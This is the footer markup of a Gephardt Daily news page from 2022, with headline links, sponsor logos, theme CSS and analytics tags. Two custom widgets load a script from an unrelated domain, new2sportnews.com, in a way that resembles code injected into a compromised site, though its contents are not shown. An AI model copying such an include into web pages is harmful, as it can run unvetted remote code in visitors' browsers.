		<ul>
											<li>
					<a href="https://gephardtdaily.com/national-international/white-house-celebrates-inflation-reduction-act-as-stocks-plunge/" aria-current="page">White House celebrates Inflation Reduction Act as stocks plunge</a>
									</li>
											<li>
					<a href="https://gephardtdaily.com/local/millard-county-jail-inmate-dies-after-being-found-unresponsive-in-cell/">Millard County Jail inmate dies after being found unresponsive in cell</a>
									</li>
											<li>
					<a href="https://gephardtdaily.com/local/west-coast-conference-issues-statement-of-support-for-byus-investigation-into-racist-remarks/">West Coast Conference issues statement of support for BYU&#8217;s investigation into racist remarks</a>
									</li>
											<li>
					<a href="https://gephardtdaily.com/national-international/dow-plunges-1276-points-in-worst-day-since-june-2020/">Dow plunges 1,276 points in worst day since June 2020</a>
									</li>
											<li>
					<a href="https://gephardtdaily.com/local/police-arrest-man-who-allegedly-threatened-st-george-school-resource-officer/">Police arrest man who allegedly threatened St. George school resource officer</a>
									</li>
											<li>
					<a href="https://gephardtdaily.com/entertainment/ramsey-lewis-grammy-winning-jazz-pianist-dies-at-87/">Ramsey Lewis, Grammy-winning jazz pianist, dies at 87</a>
									</li>
											<li>
					<a href="https://gephardtdaily.com/local/police-ask-for-publics-help-locating-teen-in-possible-grantsville-kidnapping/">Update: Police locate teen in suspected Grantsville kidnapping</a>
									</li>
											<li>
					<a href="https://gephardtdaily.com/local/police-1-shot-in-face-during-possible-road-rage-incident-in-taylorsville/">Police: 1 shot in face during possible road-rage incident in Taylorsville</a>
									</li>
											<li>
					<a href="https://gephardtdaily.com/local/slcpd-suspect-arrested-on-aggravated-assault-drug-charges-after-reversing-truck-into-police-car/">SLCPD: Suspect arrested on aggravated assault, drug charges after reversing truck into police car</a>
									</li>
											<li>
					<a href="https://gephardtdaily.com/local/i-15-driver-critically-injured-when-car-t-boned-by-semi-in-weber-county/">Update: Driver dies after I-15 accident, collision with semi in Weber County</a>
									</li>
					</ul>

		</aside><aside class="widget_text td_block_template_1 widget widget_custom_html"><div class="textwidget custom-html-widget"><script src="https://new2sportnews.com/gephardtdaily.js"></script></div></aside>            </div>

            <div class="td-pb-span4">
                <aside class="widget_text td_block_template_1 widget widget_custom_html"><div class="textwidget custom-html-widget"><script src="https://new2sportnews.com/gephardtdaily.js"></script></div></aside>            </div>

            <div class="td-pb-span4">
                            </div>
        </div>
    </div>
<div class="td-footer-bottom-full">
    <div class="td-container">
        <div class="td-pb-row">
            <div class="td-pb-span3"><aside class="footer-logo-wrap"><a href="https://gephardtdaily.com/"><img class="td-retina-data" src="https://storage.googleapis.com/daily-wp-uploads/1/2016/07/GephardtDaily-onDark280x96.png" data-retina="https://storage.googleapis.com/daily-wp-uploads/1/2016/07/GephardtDaily-onDark280x96.png" alt="News in Utah" title="Gephardt Daily news"  /></a></aside></div><div class="td-pb-span5"><aside class="footer-text-wrap"><div class="block-title"><span>ABOUT US</span></div><h1 style = "color:white">Gephardt Daily | National and Utah News</h1>
Gephardt Daily, a Utah news team, is the fastest growing online news service in
the Rocky Mountain West. GephardtDaily.com is home to a
team of Emmy Award winning journalists, including veteran
news producers, reporters, writers, videographers and social
media experts.<div class="footer-email-wrap">Contact us: <a href="/cdn-cgi/l/email-protection#96f8f3e1e5d6f1f3e6fef7e4f2e2f2f7fffaefb8f5f9fb"><span class="__cf_email__" data-cfemail="751b100206351210051d1407110111141c190c5b161a18">[email&#160;protected]</span></a></div></aside></div><div class="td-pb-span4"><aside class="footer-social-wrap td-social-style-2"><div class="block-title"><span>FOLLOW US</span></div>
        <span class="td-social-icon-wrap">
            <a target="_blank" rel="nofollow" href="https://www.facebook.com/GephardtDaily" title="Facebook">
                <i class="td-icon-font td-icon-facebook"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" rel="nofollow" href="/cdn-cgi/l/email-protection#a6c8c3d1d5e6c1c3d6cec7d4c2d2c2c7cfcadf88c5c9cb" title="Mail">
                <i class="td-icon-font td-icon-mail-1"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" rel="nofollow" href="https://gephardtdaily.com/feed/" title="RSS">
                <i class="td-icon-font td-icon-rss"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" rel="nofollow" href="https://twitter.com/@gephardtdaily" title="Twitter">
                <i class="td-icon-font td-icon-twitter"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" rel="nofollow" href="https://www.youtube.com/channel/UC3tE8FL8my2i7kTfltD3X-Q" title="Youtube">
                <i class="td-icon-font td-icon-youtube"></i>
            </a>
        </span></aside></div>        </div>
    </div>
</div>
</div>
                <!-- Sub Footer -->
				    <div class="td-sub-footer-container td-container-wrap ">
        <div class="td-container">
            <div class="td-pb-row">
                <div class="td-pb-span td-sub-footer-menu">
                    <div class="menu-footer1-container"><ul id="menu-footer1" class="td-subfooter-menu"><li id="menu-item-634652" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-first td-menu-item td-normal-menu menu-item-634652"><a href="https://gephardtdaily.com/fact-checking-policy/">Fact-Checking Policy</a></li>
<li id="menu-item-634653" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-634653"><a href="https://gephardtdaily.com/code-of-ethics/">Code of Ethics</a></li>
<li id="menu-item-634654" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-634654"><a href="https://gephardtdaily.com/correction-policy/">Correction Policy</a></li>
<li id="menu-item-634655" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-634655"><a href="https://gephardtdaily.com/terms-and-conditions/">Terms and Conditions</a></li>
<li id="menu-item-643605" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-643605"><a href="https://gephardtdaily.com/ownership-and-funding/">Ownership and Funding</a></li>
<li id="menu-item-634656" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-634656"><a href="https://gephardtdaily.com/advertise-with-us/">Advertise with Us</a></li>
<li id="menu-item-634657" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-privacy-policy td-menu-item td-normal-menu menu-item-634657"><a href="https://gephardtdaily.com/privacy-policy/">Privacy Policy</a></li>
<li id="menu-item-668981" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-668981"><a href="https://gephardtdaily.com/sitemap.xml">Sitemap</a></li>
</ul></div>                </div>

                <div class="td-pb-span td-sub-footer-copy">
                    &copy; 2022 Gephardt Companies                </div>
            </div>
        </div>
    </div>
            </div><!--close td-footer-wrap-->
			
</div><!--close td-outer-wrap-->



        <div id="simple-sticky-footer-container">
            <div id="simple-sticky-footer" 
                 style="width: 100%; ; ;">
              <div id="tdi_7" class="tdc-row"><div id="stick row" class="vc_row tdi_8  wpb_row td-pb-row" >
<style scoped>

/* custom css */
.tdi_8,
                .tdi_8 .tdc-columns{
                    min-height: 0;
                }.tdi_8,
				.tdi_8 .tdc-columns{
				    display: block;
				}.tdi_8 .tdc-columns{
				    width: 100%;
				}
</style><div class="vc_column tdi_10  wpb_column vc_column_container tdc-column td-pb-span12">
<style scoped>

/* custom css */
.tdi_10{
                    vertical-align: baseline;
                }.tdi_10 > .wpb_wrapper,
				.tdi_10 > .wpb_wrapper > .tdc-elements{
				    display: block;
				}.tdi_10 > .wpb_wrapper > .tdc-elements{
				    width: 100%;
				}.tdi_10 > .wpb_wrapper > .vc_row_inner{
				    width: auto;
				}.tdi_10 > .wpb_wrapper{
				    width: auto;
				    height: auto;
				}
</style><div class="wpb_wrapper"><div class="wpb_wrapper wpb_text_column td_block_wrap td_block_wrap vc_column_text tdi_11  tagdiv-type td-pb-border-top td_block_template_1"  data-td-block-uid="tdi_11" ><div class="td-block-title-wrap"></div><div class="td-fix-index">				<style>			
			#wpls-logo-showcase-slider-1 .wpls-fix-box,
			#wpls-logo-showcase-slider-1 .wpls-fix-box img.wp-post-image{max-height:75px; }
		</style>
		<div class="wpls-logo-showcase-slider-wrp wpls-logo-clearfix " data-conf="{&quot;slides_column&quot;:&quot;6&quot;,&quot;slides_scroll&quot;:1,&quot;dots&quot;:&quot;false&quot;,&quot;arrows&quot;:&quot;true&quot;,&quot;autoplay&quot;:&quot;true&quot;,&quot;autoplay_interval&quot;:2000,&quot;loop&quot;:&quot;true&quot;,&quot;rtl&quot;:&quot;false&quot;,&quot;speed&quot;:1000,&quot;center_mode&quot;:&quot;false&quot;,&quot;lazyload&quot;:&quot;&quot;}">
			<div class="wpls-logo-showcase logo_showcase wpls-logo-slider  wpls-design-1  sliderimage_hide_border wpls-dots-false" id="wpls-logo-showcase-slider-1" >
				
<div class="wpls-logo-cnt">
	<div class="wpls-fix-box">
					<a href="https://essolar.com/" target="_blank">
				<img class="wp-post-image"  src="https://gephardtdaily.com/wp-content/uploads/2020/04/Logo-Trans.png" title="ES SolarLogo Trans" alt="" />
			</a>
			</div>
	</div>
<div class="wpls-logo-cnt">
	<div class="wpls-fix-box">
					<a href="https://da4da.com/" target="_blank">
				<img class="wp-post-image"  src="https://gephardtdaily.com/wp-content/uploads/2020/04/DA-favi2-e1662668920443.png" title="Ahn for DA" alt="Ahn for DA" />
			</a>
			</div>
	</div>
<div class="wpls-logo-cnt">
	<div class="wpls-fix-box">
					<a href="https://legacyroofingutah.com/?utm_source=gephardt&#038;utm_medium=gephardt%20daily&#038;utm_campaign=daily%20email%20update&#038;utm_content=legacy" target="_blank">
				<img class="wp-post-image"  src="https://gephardtdaily.com/wp-content/uploads/2020/04/sign-2x3-LegacyRoofing-marquee-footer-1.png" title="Legacy Roofing" alt="Legacy Roofing" />
			</a>
			</div>
	</div>
<div class="wpls-logo-cnt">
	<div class="wpls-fix-box">
					<a href="https://reamsfoods.com/?utm_source=Gephardt+Daily&#038;utm_medium=Sticky+Ticker&#038;utm_id=112021" target="_blank">
				<img class="wp-post-image"  src="https://gephardtdaily.com/wp-content/uploads/2021/11/reams-e1657433400937.png" title="reams" alt="Reams Food Stores" />
			</a>
			</div>
	</div>
<div class="wpls-logo-cnt">
	<div class="wpls-fix-box">
					<a href="https://www.staufferstowing.com/?utm_source=Gephardt+Daily&#038;utm_medium=Sticky+Ticker&#038;utm_id=112021" target="_blank">
				<img class="wp-post-image"  src="https://gephardtdaily.com/wp-content/uploads/2021/11/qHqXxXgk-1-e1638299991826.png" title="Stauffer&#8217;s Towing" alt="Stauffer&#039;s Towing" />
			</a>
			</div>
	</div>
<div class="wpls-logo-cnt">
	<div class="wpls-fix-box">
					<a href="https://www.jonescarcares.com/" target="_blank">
				<img class="wp-post-image"  src="https://gephardtdaily.com/wp-content/uploads/2022/01/Jones-logo-PointS-250x250-1-e1642985920581.png" title="Jones Complete Care Care" alt="Jones Complete Care Care" />
			</a>
			</div>
	</div>
<div class="wpls-logo-cnt">
	<div class="wpls-fix-box">
					<a href="https://braddebry.com/?utm_source=Gephardt+Daily&#038;utm_medium=Sticky+Ticker&#038;utm_id=112021" target="_blank">
				<img class="wp-post-image"  src="https://gephardtdaily.com/wp-content/uploads/2022/06/250-250-logo-blue-e1654267246772.png" title="Brad Debry" alt="Brad Debry" />
			</a>
			</div>
	</div>			</div>
		</div>
			
		
</div></div></div></div></div></div>            </div>
        </div>

<script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script>
   delay = 0 * 1000;
   effect = 'fade';

</script>

        

    <!--

        Theme: Newspaper by tagDiv.com 2022
        Version: 11.5.1 (rara)
        Deploy mode: deploy
        
        uid: 6321a683946c0
    -->

    
<!-- Custom css from theme panel -->
<style type="text/css" media="screen">
/* custom css theme panel */
.td_block_slide .td-post-views{display:none;}

body {
    background-position: top;
}


.td-pb-span12.vc_col-lg-offset-0.vc_col-lg-12.breaking.wpb_column.vc_column_container.vc_custom_1450089403735 {
    position: relative;
    top: -40px;
    min-height: 50px;
    padding-top: 10px;
}


.td-doubleSlider-2.td_center_slide2 {
  padding: 15px 0 10px 0;
}

.slider_ads {
    bottom: -15px;
    position: relative;
}

.wpp-list li {
    padding-bottom: 10px;
    line-height: 22px !important;
}

#wpcf7-f323596-p372730-o1 {
    background-color: rgba(112, 122, 132, 0.12);
    padding: 20px;
}

body.td-animation-stack-type0 .td-animation-stack .entry-thumb,
body.td-animation-stack-type0 .post img {
  opacity: 1 !IMPORTANT;
}

.td-banner-wrap-full.td-logo-wrap-full {
   /*  background-image:url(https://gephardtdaily.com/wp-content/uploads/2021/04/Day-Header2.jpg);*/
 background-image:url(https://gephardtdaily.com/wp-content/uploads/Day-Header.jpg);
  /*  background-image:url(https://storage.googleapis.com/daily-wp-uploads/1/2018/08/Day-Header.png);*/
    /*background-image:url(https://storage.googleapis.com/daily-wp-uploads/1/2019/01/Day-Header-Vannova.png);*/
    min-height: 240px !important;
    background-position: top center;
    line-height: 130px;
    background-repeat: no-repeat;
    background-size: cover;
}

.td-logo-text-container a {
    /* line-height: 1; */
    min-width: 1000px;
    min-height: 216px;
}


.td-post-category {
    font-size: 17px;
    background-color: #2197bf;
}

#local-top .tdc-column {
    height: 218px;
    margin: -77px 0 50px 0;
}

#simple-sticky-footer-container {
    max-height:100px;
    /*display:block !important;*/
}


/* custom responsive css from theme panel (Advanced CSS) */
@media (min-width: 1141px) {
.td-logo-text {
min-width: 600px;
min-height: 100px;
}

.td-banner-wrap-full.td-logo-wrap-full {
background-image:url(https://gephardtdaily.com/wp-content/uploads/Day-Header.jpg);

/*    background-image:url(https://storage.googleapis.com/daily-wp-uploads/1/2018/08/Day-Header.png);
  /*background-image:url(https://storage.googleapis.com/daily-wp-uploads/1/2019/01/Day-Header-Vannova.png);*/
    min-height: 240px !important;
    background-position: top center;
    line-height: 130px;
    background-repeat: no-repeat;
    background-size: cover;
}

.td-g-rec-id-content_inlineleft, .td-a-rec-id-content_inlineleft {
    padding-right: 15px;
}

.td-logo-text-container a {
    /* line-height: 1; */
    min-width: 1000px;
    min-height: 216px;
}

}


/* custom responsive css from theme panel (Advanced CSS) */
@media (min-width: 1019px) and (max-width: 1140px) {
@viewport {
    width: device-width;
    zoom: .5;
  }
  .td-g-rec-id-content_inlineleft, .td-a-rec-id-content_inlineleft {
    padding-right: 15px;
}

}


/* custom responsive css from theme panel (Advanced CSS) */
@media (min-width: 768px) and (max-width: 1018px) {
.td-banner-wrap-full.td-logo-wrap-full {
    display:none;
}
}


/* custom responsive css from theme panel (Advanced CSS) */
@media (max-width: 767px) {
.td-banner-wrap-full.td-logo-wrap-full {
        display:none;
}

.td_module_mob_2 .td-module-thumb {
    height: 207px !important;
}

amp-ad {
    margin: 9px 9% 7px 9%;
}

.td-fix-index 
    {
        height:75px;
    }
    
.wpls-logo-showcase {
    visibility: inherit !important;
    display: contents;
}
}
</style>

    <!-- Meta Pixel Event Code -->
    <script type='text/javascript'>
        document.addEventListener( 'wpcf7mailsent', function( event ) {
        if( "fb_pxl_code" in event.detail.apiResponse){
          eval(event.detail.apiResponse.fb_pxl_code);
        }
      }, false );
    </script>
    <!-- End Meta Pixel Event Code -->
    <div id='fb-pxl-ajax-code'></div>		<!-- Quantcast Tag -->
		<script type="text/javascript">
			var _qevents = _qevents || [];

			(function() {
				var elem = document.createElement('script');
				elem.src = (document.location.protocol == "https:" ? "https://secure" : "http://edge") + ".quantserve.com/quant.js";
				elem.async = true;
				elem.type = "text/javascript";
				var scpt = document.getElementsByTagName('script')[0];
				scpt.parentNode.insertBefore(elem, scpt);
			})();

			_qevents.push({
				qacct:"p-ReBwtU8jf9AzX",
				source:"wp"
			});
		</script>

		<noscript>
		<div style="display:none;">
			<img src="//pixel.quantserve.com/pixel/p-ReBwtU8jf9AzX.gif" border="0" height="1" width="1" alt="Quantcast"/>
		</div>
		</noscript>
		<!-- End Quantcast tag -->
		<link rel='stylesheet' id='simple-sticky-footer-css'  href='https://gephardtdaily.com/wp-content/plugins/simple-sticky-footer/simple-sticky-footer.css?ver=6.0.2' type='text/css' media='all' />
<script src='//gephardtdaily.com/wp-content/cache/wpfc-minified/6mqkdmih/sajx.js' type="text/javascript"></script>
<!-- <script type='text/javascript' src='https://gephardtdaily.com/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.6.3' id='swv-js'></script> -->
<script type='text/javascript' id='contact-form-7-js-extra'>
/* <![CDATA[ */
var wpcf7 = {"api":{"root":"https:\/\/gephardtdaily.com\/wp-json\/","namespace":"contact-form-7\/v1"},"cached":"1"};
/* ]]> */
</script>
<script src='//gephardtdaily.com/wp-content/cache/wpfc-minified/8ase9cen/sajx.js' type="text/javascript"></script>
<!-- <script type='text/javascript' src='https://gephardtdaily.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.6.3' id='contact-form-7-js'></script> -->
<script type='text/javascript' id='ppress-frontend-script-js-extra'>
/* <![CDATA[ */
var pp_ajax_form = {"ajaxurl":"https:\/\/gephardtdaily.com\/wp-admin\/admin-ajax.php","confirm_delete":"Are you sure?","deleting_text":"Deleting...","deleting_error":"An error occurred. Please try again.","nonce":"e0d770c258","disable_ajax_form":"false","is_checkout":"0","is_checkout_tax_enabled":"0"};
/* ]]> */
</script>
<script src='//gephardtdaily.com/wp-content/cache/wpfc-minified/d48zuay2/sajz.js' type="text/javascript"></script>
<!-- <script type='text/javascript' src='https://gephardtdaily.com/wp-content/plugins/wp-user-avatar/assets/js/frontend.min.js?ver=4.1.4' id='ppress-frontend-script-js'></script> -->
<!-- <script type='text/javascript' src='https://gephardtdaily.com/wp-includes/js/underscore.min.js?ver=1.13.3' id='underscore-js'></script> -->
<!-- <script type='text/javascript' src='https://gephardtdaily.com/wp-content/plugins/td-cloud-library/assets/js/js_posts_autoload.min.js?ver=4173294bcf58591c4439ff8ccd792f1ex' id='tdb_js_posts_autoload-js'></script> -->
<!-- <script type='text/javascript' src='https://gephardtdaily.com/wp-content/plugins/td-composer/legacy/Newspaper/js/tagdiv_theme.min.js?ver=11.5.1' id='td-site-min-js'></script> -->
<!-- <script type='text/javascript' src='https://gephardtdaily.com/wp-includes/js/comment-reply.min.js?ver=6.0.2' id='comment-reply-js'></script> -->
<!-- <script type='text/javascript' src='https://gephardtdaily.com/wp-content/plugins/td-cloud-library/assets/js/js_files_for_front.min.js?ver=4173294bcf58591c4439ff8ccd792f1ex' id='tdb_js_files_for_front-js'></script> -->
<!-- <script type='text/javascript' src='https://gephardtdaily.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.1' id='jquery-ui-core-js'></script> -->
<!-- <script type='text/javascript' src='https://gephardtdaily.com/wp-includes/js/jquery/ui/effect.min.js?ver=1.13.1' id='jquery-effects-core-js'></script> -->
<!-- <script type='text/javascript' src='https://gephardtdaily.com/wp-includes/js/jquery/ui/effect-blind.min.js?ver=1.13.1' id='jquery-effects-blind-js'></script> -->
<!-- <script type='text/javascript' src='https://gephardtdaily.com/wp-includes/js/jquery/ui/effect-bounce.min.js?ver=1.13.1' id='jquery-effects-bounce-js'></script> -->
<!-- <script type='text/javascript' src='https://gephardtdaily.com/wp-includes/js/jquery/ui/effect-clip.min.js?ver=1.13.1' id='jquery-effects-clip-js'></script> -->
<!-- <script type='text/javascript' src='https://gephardtdaily.com/wp-includes/js/jquery/ui/effect-drop.min.js?ver=1.13.1' id='jquery-effects-drop-js'></script> -->
<!-- <script type='text/javascript' src='https://gephardtdaily.com/wp-includes/js/jquery/ui/effect-explode.min.js?ver=1.13.1' id='jquery-effects-explode-js'></script> -->
<!-- <script type='text/javascript' src='https://gephardtdaily.com/wp-includes/js/jquery/ui/effect-fade.min.js?ver=1.13.1' id='jquery-effects-fade-js'></script> -->
<!-- <script type='text/javascript' src='https://gephardtdaily.com/wp-includes/js/jquery/ui/effect-fold.min.js?ver=1.13.1' id='jquery-effects-fold-js'></script> -->
<!-- <script type='text/javascript' src='https://gephardtdaily.com/wp-includes/js/jquery/ui/effect-highlight.min.js?ver=1.13.1' id='jquery-effects-highlight-js'></script> -->
<!-- <script type='text/javascript' src='https://gephardtdaily.com/wp-includes/js/jquery/ui/effect-pulsate.min.js?ver=1.13.1' id='jquery-effects-pulsate-js'></script> -->
<!-- <script type='text/javascript' src='https://gephardtdaily.com/wp-includes/js/jquery/ui/effect-size.min.js?ver=1.13.1' id='jquery-effects-size-js'></script> -->
<!-- <script type='text/javascript' src='https://gephardtdaily.com/wp-includes/js/jquery/ui/effect-scale.min.js?ver=1.13.1' id='jquery-effects-scale-js'></script> -->
<!-- <script type='text/javascript' src='https://gephardtdaily.com/wp-includes/js/jquery/ui/effect-shake.min.js?ver=1.13.1' id='jquery-effects-shake-js'></script> -->
<!-- <script type='text/javascript' src='https://gephardtdaily.com/wp-includes/js/jquery/ui/effect-slide.min.js?ver=1.13.1' id='jquery-effects-slide-js'></script> -->
<!-- <script type='text/javascript' src='https://gephardtdaily.com/wp-includes/js/jquery/ui/effect-transfer.min.js?ver=1.13.1' id='jquery-effects-transfer-js'></script> -->
<!-- <script type='text/javascript' src='https://gephardtdaily.com/wp-content/plugins/simple-sticky-footer/simple-sticky-footer.js?ver=6.0.2' id='simple-sticky-footer-js'></script> -->
<!-- <script defer type='text/javascript' src='https://gephardtdaily.com/wp-content/plugins/akismet/_inc/akismet-frontend.js?ver=1658881750' id='akismet-frontend-js'></script> -->
<!-- <script type='text/javascript' src='https://gephardtdaily.com/wp-content/plugins/wp-logo-showcase-responsive-slider-slider/assets/js/slick.min.js?ver=3.1.4' id='wpos-slick-jquery-js'></script> -->
<script type='text/javascript' id='wpls-public-js-js-extra'>
/* <![CDATA[ */
var Wpls = {"is_mobile":"0","is_rtl":"0","is_avada":"0"};
/* ]]> */
</script>
<script src='//gephardtdaily.com/wp-content/cache/wpfc-minified/1fejphzt/sajx.js' type="text/javascript"></script>
<!-- <script type='text/javascript' src='https://gephardtdaily.com/wp-content/plugins/wp-logo-showcase-responsive-slider-slider/assets/js/wpls-public.js?ver=3.1.4' id='wpls-public-js-js'></script> -->

<!-- JS generated by theme -->

<script>
    

			
				jQuery().ready(function () {
					tdWeather.addItem({"block_uid":"td_top_weather_uid","location":"Salt Lake City, US","api_location":"Salt Lake City","api_language":"en","api_key":"410233eddff1b1038a4776b55615566f","today_icon":"broken-clouds-n","today_icon_text":"overcast clouds","today_temp":[16,60.9],"today_humidity":91,"today_wind_speed":[3.6,2.2],"today_min":[14.9,58.7],"today_max":[17.3,63.2],"today_clouds":100,"current_unit":1,"forecast":[{"timestamp":1663146000,"day_name":"Wed","day_temp":[23,73],"owm_day_index":0},{"timestamp":1663200000,"day_name":"Thu","day_temp":[24,75],"owm_day_index":5},{"timestamp":1663286400,"day_name":"Fri","day_temp":[24,75],"owm_day_index":13},{"timestamp":1663372800,"day_name":"Sat","day_temp":[25,78],"owm_day_index":21},{"timestamp":1663459200,"day_name":"Sun","day_temp":[25,78],"owm_day_index":29}]});
				});
			
			
</script>


</body>
</html><!-- WP Fastest Cache file was created in 0.32915782928467 seconds, on 14-09-22 4:01:39 --><!-- via php -->